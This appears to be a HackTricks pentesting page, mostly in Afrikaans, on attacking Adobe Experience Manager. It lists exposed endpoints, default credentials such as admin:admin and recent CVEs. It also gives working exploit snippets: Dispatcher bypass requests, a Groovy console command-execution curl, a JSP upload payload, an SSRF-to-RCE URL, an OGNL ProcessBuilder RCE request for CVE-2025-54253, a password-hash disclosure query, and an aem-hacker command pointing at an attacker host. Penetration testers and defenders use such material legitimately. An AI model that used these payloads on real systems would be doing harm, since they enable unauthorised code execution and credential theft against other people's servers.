HackTricks
AEM (Adobe Experience Manager) Pentesting
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Adobe Experience Manager (AEM, deel van die Adobe Experience Cloud) is ’n enterprise CMS wat op Apache Sling/Felix (OSGi) en ’n Java Content Repository (JCR) loop. Vanuit ’n aanvaller se perspektief openbaar AEM-instanse baie gereeld gevaarlike ontwikkelings-endpoints, swak Dispatcher-reëls, standaard credentials en ’n lang ry CVEs wat elke kwartaal gepatch word.
The checklist below focuses on externally reachable (unauth) attack surface that keeps showing up in real engagements (2022-2026).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Other quick indicators:
/etc.clientlibs/statiese pad teenwoordig (lewer JS/CSS)./libs/granite/core/content/login.htmlaanmeldbladsy met die “Adobe Experience Manager” banier.</script><!--/* CQ */-->kommentaar aan die onderkant van die HTML.
2. Hoë-waarde ongemagtigde endpoints
| Path | What you get | Notes |
|---|---|---|
/.json, /.1.json | JCR nodes via DefaultGetServlet | Word dikwels geblokkeer, maar Dispatcher bypass (sien hieronder) werk. |
/bin/querybuilder.json?path=/ | QueryBuilder API | Leak van bladsyboom, interne paaie en gebruikersname. |
/system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 per verstek; indien blootgestel en creds gevind ⇒ bundle-upload RCE. |
/crx/packmgr/index.jsp | Package Manager | Laat geauthentiseerde content-pakkette toe → JSP payload upload. |
/etc/groovyconsole/** | AEM Groovy Console | Indien blootgestel → arbitrêre Groovy / Java-uitvoering. |
/libs/cq/AuditlogSearchServlet.json | Audit logs | Inligtingslek. |
/libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS-vektor. |
/adminui/debug | AEM Forms on JEE Struts dev-mode OGNL evaluator | Op verkeerd geconfigureerde Forms-installasies (CVE-2025-54253) voer hierdie endpoint ongemagtigde OGNL uit → RCE. |
Dispatcher bypass tricks (still working in 2025/2026)
Die meeste produksiewebwerwe sit agter die Dispatcher (reverse-proxy). Filterreëls word dikwels omseil deur gekodeerde karakters of toegelate statiese uitbreidings te misbruik.
Classic semicolon + allowed extension
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
Encoded slash bypass (2025 KB ka-27832)
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
If die Dispatcher enkodeerde skuinsstrepies toelaat, stuur dit JSON terug selfs wanneer /bin veronderstel is om geweier te wees.
3. Algemene wankonfigurasies (nog steeds aktief in 2026)
- Anonymous POST servlet –
POST /.jsonwith:operation=importlaat jou nuwe JCR-nodes plant. Om*.jsonPOST in die Dispatcher te blokkeer los dit op. - Wêreldleesbare gebruikersprofiele – standaard ACL verleen
jcr:readop/home/users/**/profile/*aan almal. - Default credentials –
admin:admin,author:author,replication:replication. - WCMDebugFilter aangeskakel ⇒ reflected XSS via
?debug=layout(CVE-2016-7882, nog steeds gevind op legacy 6.4 installasies). - Groovy Console exposed – remote code execution deur ’n Groovy-skrip te stuur:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
- Dispatcher encoded-slash gap –
/bin/querybuilder.jsonand/etc/truststore.jsontoeganklik met%2f/%3Bselfs wanneer dit deur padfilters geblokkeer word. - AEM Forms Struts devMode left enabled –
/adminui/debug?expression=evalueer OGNL sonder auth (CVE-2025-54253), wat lei tot unauth RCE; gepaardgaande XXE in Forms-indiening (CVE-2025-54254) laat lêerlees toe.
4. Onlangse kwetsbaarhede (service-pack cadence)
| Kwartaal | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution via author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) – upgrade to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv). |
| Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via crafted URL. |
Kontroleer altyd die APSB bulletin wat by die kliënt se service-pack pas en dring aan op die nuutste 6.5.24 (Nov 26, 2025) of Cloud Service 2025.12. AEM Forms on JEE benodig sy eie add-on hotfix 6.5.0-0108+.
5. Exploitation snippets
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Now request /content/evil.jsp – die JSP word uitgevoer as die AEM-prosesgebruiker.
5.2 SSRF to RCE (geskiedkundig < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py from aem-hacker outomatiseer die volledige ketting.
5.3 OGNL RCE op AEM Forms JEE (CVE-2025-54253)
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
5.4 QueryBuilder hash disclosure (encoded slash bypass)
As dit kwesbaar is, bevat die HTTP-body die uitvoer van die opdrag.
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
Gee gebruikersnodes terug wat rep:password hashes insluit wanneer anonieme lees-ACLs standaard is.
6. Gereedskap
- aem-hacker – alles-in-een enumerasie-skrip, ondersteun dispatcher bypass, SSRF detection, default-creds checks en meer.
python3 aem_hacker.py -u https://target --host attacker-ip
- Tenable WAS plugin 115065 – Detecteer QueryBuilder hash disclosure & encoded-slash bypass outomaties (gepubliseer Des 2025).
- Content brute-force – rekursief versoek
/_jcr_content.(json|html)om versteekte komponente te ontdek. - osgi-infect – laai kwaadwillige OSGi-bundel op via
/system/console/bundlesindien creds beskikbaar is.
References
- Adobe Security Bulletin APSB25-115 – Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer – Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)
Tip
Leer en oefen AWS Hacking:
Leer en oefen GCP Hacking:Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.